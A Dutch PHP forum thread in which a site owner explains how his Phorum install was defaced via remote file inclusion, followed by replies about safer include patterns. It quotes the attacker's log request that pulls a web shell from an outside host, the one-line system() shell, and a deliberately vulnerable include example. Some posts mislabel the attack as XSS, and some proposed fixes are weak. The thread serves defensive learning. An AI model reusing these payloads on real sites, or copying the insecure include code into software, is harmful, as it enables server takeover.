Veiligheidsbreuk, gehacked, XSS

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Team Lead/ Lead developer gezocht (Hands-on, PHP,

Functie Als Team Lead ben je de leider van één van de ontwikkelteams binnen de organisatie. Je leidt als lead developer een goed draaiend team dat werkt aan complexe en duurzame applicaties en API’s. Vanuit je kennis en ervaring ben je in staat het grote plaatje te blijven overzien, en kritisch mee te denken over bijvoorbeeld de architectuur, maar ook de algehele aanpak binnen het project. Je laat je team niet alleen technisch goed functioneren maar ben ook betrokken bij het menselijke aspect. Zo weet jij je collega’s te motiveren en begeleiden in hun dagelijkse werk. Buiten het team ben

Bekijk vacature »

Back-end Developer

Functie omschrijving Als Back-end Developer heb je de eer om als eerste interne developer bij deze organisatie te beginnen. Op dit moment zijn er externe developers, maar daar wil de organisatie verandering in brengen. Op termijn moet de gehele afdeling uit intern personeel bestaan. Je kan je voorstellen dat de eerste interne developer ook de nodige kennis mee moet brengen. Dat klopt. Je gaat je namelijk aan het begin bekommeren over de externe developers en uiteindelijk over je interne collega's. Verder ga je het volgende doen: Het bedenken, beheren en onderhouden van webportalen, API-koppelingen en applicaties; Je bedenkt en werkt

Bekijk vacature »

Senior Node.js developer Digital Agency

Functie Door de groei van de organisatie zijn ze op zoek naar een Tech Lead. Als tech lead ben jij verantwoordelijk Als Back end Node.js developer kom je terecht in een van de 8 multidisciplinaire teams in het projectenhuis. Afhankelijk van jouw interesses, wensen en capaciteiten word je bij projecten en onderwerpen naar keuze betrokken. Als ervaren ontwikkelaar zul jij vaak leiding nemen in de projecten en in het team een aanvoerder zijn van technische discussies. Uiteindelijk wil jij natuurlijk de klantwensen zo goed mogelijk vertalen naar robuuste code. De projecten kunnen varieren van langlopende- tot kleinschalige trajecten. Voorheen werkte

Bekijk vacature »

.NET Developer

Functie omschrijving Ben jij een senior .NET developer en heb jij tevens ervaring als teamlead? Ben jij iemand met een helikopterview en denk jij graag mee met de klanten? Dan zijn wij op zoek naar jou! Voor een geweldig bedrijf zijn wij namelijk op zoek naar een ervaren .NET developer. Het bedrijf houdt zich bezig met het ontwerpen en bouwen van websites, portalen en applicaties voor met name zorg- en onderwijsinstellingen en overheidsinstanties. Jouw taken: Het fungeren als Lead Developer; Het meedenken met de business (dit vergt commercieel inzicht); Het begeleiden van diverse projecten (van klein tot groot); Het ontwerpen

Bekijk vacature »

Full stack developer

Functie Binnen een ontzettend stimulerende werkomgeving kom jij te werken in een software team van 14 developers. Met ontzettend stimulerend bedoel ik een modern pand, wat voorzien is van alle nodige soft- en hardware, zodat jij jouw werk goed kan uitvoeren. Daarnaast zitten ze in een bos, waardoor je in een groene omgeving rustig kunt werken. Het team bestaat uit front end, back end en full stack developers. Jij krijgt dus de keuze hier waar jij jezelf het liefst op zou richten, maar de voorkeur gaat uit naar back end. Er wordt hier Scrum (agile) gewerkt in multidisciplinaire teams met

Bekijk vacature »

Medior Java developer (fullstack)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Airport Developer / System engineer

De functie Als onze nieuwe Airport Developer / System Engineer is je doel om uit nieuwbouw- en onderhoudsprojecten maximale waarde te creëren voor Schiphol Group en haar stakeholders. Vanuit je visie en expertise, maar ook (technologische) ontwikkelingen, wetgeving en beleid vertaal je klantwensen naar een gedegen programma van eisen. In de planontwikkelingsfase werk je nauw samen met Plan Ontwikkelaars om je kennis in te brengen ten behoeve van de kwaliteit van het investeringsvoorstel. Je overlegt met diverse partijen, stelt de vraag achter de vraag en verbindt zo de belangen van de luchthaven, proceseigenaar en asseteigenaar om tot een gedragen ontwikkelopgave

Bekijk vacature »

Gezocht: .Net ontwikkelaars met een maatschappelij

Bedrijfsomschrijving Zoek jij als medior .Net ontwikkelaar een inspirerende werkplek bij een bedrijf met maatschappelijk verantwoordelijkheidsgevoel? Dan is deze vacature je op het lijf geschreven. De organisatie bestaat ruim 20 jaar en ze ontwikkelen in house applicaties waarmee de zorgsector enorm mee gebaat is. Jouw applicaties worden gebruikt door duizenden gebruikers waardoor je echt een waardevolle bijdrage kan leveren aan de maatschappij. Het bedrijf is zeer innovatief en vindt een goede werk/privé balans belangrijk. Je krijgt alle mogelijkheden om jezelf verder te ontwikkelen, je werktijden in te delen en daarnaast is het ook mogelijk om deels thuis te werken. Het

Bekijk vacature »

Junior/medior PHP developer Onderwijssector

Functie Momenteel zijn ze op zoek naar een developer die, veelal fullstack, mee gaat werken aan de ontwikkeling van de producten en zo helpt aan de uitvoering van hun ontwikkelprojecten. Je komt te werken binnen hun development team bestaande uit 6 ontwikkelaars. Ze staan zowel open voor meer junior als medior/senior developers. Je kunt snel veel verantwoordelijkheid krijgen en doorgroeien binnen het bedrijf. Bovendien ben je betrokken bij het bepalen van de product roadmap en de inbreng van (nieuwe) technologieën. De applicaties waaraan je werk worden gebruikt op onderwijsinstellingen door heel Nederland. De tech-stack bestaat voornamelijk uit Laravel (PHP), Vue.js

Bekijk vacature »

.NET developer

Functie Als senior .NET ontwikkelaar en aankomend lead developer ben jij in één van de drie development teams verantwoordelijk voor het volgende: • Jij hebt een oogpunt op modernisering en bent verantwoordelijk voor de technische staat en architectuur van de applicatie; • Jij bent verantwoordelijk voor het reviewen van de technische haalbaarheid van verschillende onderwerpen; • Jij bent verantwoordelijk voor een goede aansluiting binnen het multidisciplinaire team en de bijbehorende taken; • Jij bent verantwoordelijk voor het aandragen van verbetervoorstellen en ontwikkelstandaarden in zowel de techniek als architectuur; • Jij bent meewerkend voorman en ondersteunt en coacht jouw team op

Bekijk vacature »

Database Developer

Functieomschrijving Heb jij ongeveer 3 jaar ervaring als Database Developer met MS SQL of een vergelijkbare database? Wil jij werken voor een ambitieuze werkgever in regio Tilburg waar jij volledig de mogelijkheid krijgt jezelf te ontwikkelen? Lees dan snel verder! Hoe ziet jouw takenpakket eruit? Je gaat projecten gedurende het hele proces begeleiden. Je sluit aan bij afspraken met klanten om hun processen helder te krijgen. Vervolgens voer jij het project uit en zorgt dat dit zo goed mogelijk verloopt; Je werkt aan nieuwe softwareoplossingen die de logistieke processen verbeteren of vernieuwen; Je houdt je bezig met het ontwikkelen van

Bekijk vacature »

Full Stack .NET Developer

Dit ga je doen Als developer nieuwe gave features ontwikkelen; Werken met technieken als C#, Angular 12 en Javascript,; Maken van technische keuzes en beslissingen over de architectuur; Junior collega's coachen; Initiatief nemen voor nieuwe technische mogelijkheden; Je bent een belangrijke schakel - en vindt het leuk - om te schakelen met de business. Hier ga je werken In een team van 7 professionals ben je als Full Stack .NET Developer verantwoordelijk voor het ontwikkelen van applicaties voor het grootste inhouse product: een applicatie voor alles omtrent hypotheken. De programmeertaal die je hierbij beheerst is C#. Wil je van meerwaarde

Bekijk vacature »

Medior .NET developer

Functie Jij gaat als Medior .NET ontwikkelaar aan de slag in ons scrumteam met 6 developers die gepassioneerd en actief bezig zijn om onze spelers kwalitatieve en mooie spelervaringen aan te bieden. Als medior .NET developer ga jij werken aan een technisch hoogwaardig platform welke bezoekerspieken verwerkt van tienduizenden tot honderdduizenden gebruikers per minuut! Ons scrumteam werkt in drie wekelijkse sprints en wij beginnen iedere ochtend met een stand-up. Jij werkt bij ons met C# .NET, .NET Core, React.JS, Xamarin, Azure, Docker en Kubernetes. Wij hechten enorm veel waarde aan het leveren van hoogwaardige en kwalitatieve code. Zodra jij de

Bekijk vacature »

Junior PHP (Laravel) Developer

Functie omschrijving Wij zijn op zoek naar een PHP Laravel Developer! Sta je aan het begin van je carrière en ben je op zoek naar een leuke baan? Lees dan verder! Voor een softwarebedrijf in omgeving van Schiphol zijn wij op zoek naar een ervaren PHP (Laravel) Developer. Je gaat je bezighouden met het ontwikkelen van innovatieve bedrijfsapplicaties. Samen met het team, bestaande uit designers en developers, maak je mooie oplossingen voor bedrijven in diverse branches. Je zorgt dat de opgeleverde websites perfect werken en de klant meer dan tevreden is. Je kunt rekenen op een afwisselende baan met leuke

Bekijk vacature »

C# developer

Sogeti is een organisatie met een goede werksfeer en zo min mogelijk hiërarchische verhoudingen. Ga je bij ons als C# Developer aan de slag? Dan werk je dagelijks met collega’s aan de mooiste IT-projecten. Deze snelgroeiende groep collega’s krijgt energie van hun vak en dat merk je op de werkvloer. Natuurlijk krijg jij de mogelijkheid je te certificeren. We organiseren regelmatig technische Meet-ups en doen we veel aan kennisdeling. Mede hierdoor zij wij dit jaar Microsoft Partner of the Year geworden. Sogetisten staan klaar voor elkaar, hebben lol met elkaar en daarmee behalen we de mooiste resultaten! Werken bij Sogeti

Bekijk vacature »
Arend a

Arend a

12/07/2004 05:07:00
Quote Anchor link
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] "GET /phorum/admin/ HTTP/1.1" 200 5042 "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] "GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1" 403 7591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>

Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
1
2
3
<?
include($_POST["naam"]);
?>

wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
1
2
3
<?
system($_POST["commando"]);
?>

!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
1
2
3
4
5
6
7
8
9
<?
$pad
= "/home/pad/naar/file";
$variabele = $_POST["naam"];
$variabele = preg_replace('/\W','', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists("${pad}/${variabele}.ext")) {
  include("${pad}/${variabele}.ext");
}

?>

Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik 'even' geschreven heb voor het includen in mijn layout. Het 'even' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.

PHP hulp

PHP hulp

02/01/2025 14:19:42

B a s
Beheerder

B a s

12/07/2004 08:09:00
Quote Anchor link
omg :) maar goed dat je er achter bent gekomen.. maar was 'system()' dan functioneel op je server??

SerpenT

SerpenT

12/07/2004 11:37:00
Quote Anchor link
hoe kun je system() dan uitschakelen? op je server? want dit wil ik niet op mijn site laten gebeuren:O.

en nog iets arend:

Code (php)
1
2
3
<?
include($_POST["naam"]);
?>

wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

bedoel je hiet niet
Code (php)
1
2
3
<?
inculde($_GET["naam"]);
?>

of pakt ie die meegestuurde variabele in de url ook als $_POST["naam"] :O

Arend a

Arend a

12/07/2004 11:58:00
Quote Anchor link
Het was laat :)

Maar het system commando uitschaken kan wel, maar dan zjin er nog wel 4 andere manieren om er omheen te kunnen. Je moet gewoon zorgen dat er geen malafide include() verwijzingen zijn.

Grtz,

Arend
Gewijzigd op 12/07/2004 11:59:00 door Arend a

Mitch X

Mitch X

12/07/2004 12:00:00
Quote Anchor link
Je laat dat toch nooit zo doen?
Ik deed dat altijd met een switch() die kon dus nooit iets anders dan de door mij ingegeven files.

Nu werk ik niet meer met includes maar das een ander verhaal :)

Arend a

Arend a

12/07/2004 12:02:00
Quote Anchor link
mja, dat vind ik persoonlijk nogal lomp. een beetje voor elke file in mn php file gaan pielen. Maar zoals je staat was het een quick fix van twee jaar terug die nog steeds liep.

Verder was de eerste hack een 3rd party script: phorum dat hij dmv googlen ging opzoeken en exploiten.
Gewijzigd op 12/07/2004 12:08:00 door Arend a

Bram Z

Bram Z

12/07/2004 13:08:00
Quote Anchor link
Die rus ziet er een profesional uit die moet mijn site niet weten :D

Arend a

Arend a

12/07/2004 13:10:00
Quote Anchor link
Professional? Welnee, het is een eerste klas scriptkiddo. Ik heb totaal geen respect voor deze gast. Hij was op de hoogte van een lek, en ging sites opzoeken die die software draaide om te hacken.

Sorry, geen enkel respect at all.

19/09/2005 19:52:00
Quote Anchor link
Quote:
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] \"GET /phorum/admin/ HTTP/1.1\" 200 5042 \"http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] \"GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1\" 403 7591 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

de shep.php is een file met:
Code (php)
1
2
3
<?
system($cmd);
?>

Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
1
2
3
<?
include($_POST[\"naam\"]);
?>

wordt aangeroepen met:

waarin exploit.php

Code (php)
1
2
3
<?
system($_POST[\"commando\"]);
?>

!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
1
2
3
4
5
6
7
8
9
<?
$pad
= \"/home/pad/naar/file\";
$variabele = $_POST[\"naam\"];
$variabele = preg_replace(\'/\\W\',\'\', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists(\"${pad}/${variabele}.ext\")) {
  include(\"${pad}/${variabele}.ext\");
}

?>

Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik \'even\' geschreven heb voor het includen in mijn layout. Het \'even\' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.

Han eev

Han eev

19/09/2005 20:31:00
Quote Anchor link
Waarom doen ze dit?? wat hebben ze eraan?

Alfred -

Alfred -

19/09/2005 20:42:00
Quote Anchor link
Waarom worden er virussen gemaakt? Wat heb je er aan als je aan ander zn pc naar de kloten helpt? Juist ja, nog onnuttige vragen Han?

Jelmer -

Jelmer -

19/09/2005 20:55:00
Quote Anchor link
1 keer en nooit weer (neem ik aan)
Hoe simpel het ook is eigenlijk.

Ik moet toegeven dat ik ook een paar keer een site ben tegengekomen, waarvan ik dacht 'deze is makkelijk te bewerken'. Dus ben toen even gaan knutselen, en inderdaad, ook zo'n include (andere was trouwens een .inc bestand met wachtwoorden :*) ). Enige verschil is dat ik alleen heb gekeken, en daarna een mailtje heb gestuurd naar de desbetreffende webmaster.

Sterker nog, ik heb een keer (per ongeluk, was niet mijn bedoeling) toegang verkregen tot alle websites die op mijn webhosting werden gehost. Echt asociaal groot lek. Heb het gemeld (even paar screenies voor bewijs, wachtwoorden weggehaald) en blij dat ze waren! Krijg nog een cadeautje ervoor ook :P

Ik had natuurlijk ook al die wachtwoorden op internet kunnen zetten, maar dat wat ik nu heb gedaan voelt toch beter. Lees je dat rus?

Pieter van Linschoten

Pieter van Linschoten

19/09/2005 21:16:00
Quote Anchor link
Code (php)
1
2
3
4
5
6
7
8
9
<?
if (is_file($_GET['page'].".php"))
{

$include = $_GET['page'];
}
else{
$include = "Home";
}

include($include.".php");
?>
Gewijzigd op 19/09/2005 21:16:00 door Pieter van Linschoten

Legolas

Legolas

19/09/2005 21:25:00
Quote Anchor link
misschien moet je dat maar eerst ff vertalen voordat ie het kan lezen Jelmer ^^... En scriptkiddies, die zijn te zielig om sociaal te zijn =P.

Maar system is volgens mij overal geblokt ?. OW ennem wat ik me nou afvraag: hoe kan het in cluden van zo'n bestand nou werken? Ik bedoel de server waar het van komt parsed het ook... Of gaat dat via zielige geocities servers die geen php hebben =P.

Overigens is dit misbruik maken van de hosting, een beetje host wil dan nog wel eens een contract ontbinden =P. http://www.nic.ru/whois/?domain=narod.ru =P.

MJa, ik filter die gets altijd op slashes enzo, dan kunnen urls ook nie =). Net zoals ik tegen sql injection alle tekens van html-entities voorzien (inc. enkele quotes ej: htmlentities($_GET["var"], ENT_QUOTES);)

Mja, er is altijd wel iets =(

Eris -

Eris -

19/09/2005 21:28:00
Quote Anchor link
Gana we even oude koeien uit de sloot halen (Topic is een jaar oud)

Jelmer -

Jelmer -

19/09/2005 21:52:00
Quote Anchor link
ehe, dat had ik nog niet eens gezien. Stom

Dat van Lapidi lijkt mij ook niet echt veilig. Daarmee kan ik nog steeds cross-site scripten en ieder willekeurig bestand includen. Gewoon .php weglaten.

Winston Smith

Winston Smith

20/09/2005 00:02:00
Quote Anchor link
Ik gebruik altijd
Code (php)
1
2
3
4
<?php
// eerst mapje ervoor zetten
include('include/' . $page . '.inc.php');
?>

Dat is toch redelijk veilig, of zie ik iets over het hoofd?

(ook al is het een oud topic ^^)

Willem Jan Z

Willem Jan Z

20/09/2005 00:31:00
Quote Anchor link
Met die vraag zit ik eigenlijk ook... Ik dacht gewoon controleren of het bestand wel bestaat...

ik doe wel altijd uizonderingen maken voor bestanden op mijn server, zoals de config enzo... Zodat die niet opgehaald kunnen worden...

Maar dat is dus niet echt veilig blijkbaar...
Ga ik maar eens beetje aan werken...

Legolas

Legolas

20/09/2005 07:36:00
Quote Anchor link
gewoon punten en slashes eruit halen dan kan er geen url komen en blijft het in dezelfde map, kan je dus niet ../config.php doen =).

Jelmer -

Jelmer -

20/09/2005 07:40:00
Quote Anchor link
inderdaad. Of hem door een switch() / array van bestaande pagina's heen halen.

Legolas

Legolas

20/09/2005 08:11:00
Quote Anchor link
dan het beste een in_array, een switch is een beetje te veel werk :P

Overzicht Reageren

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.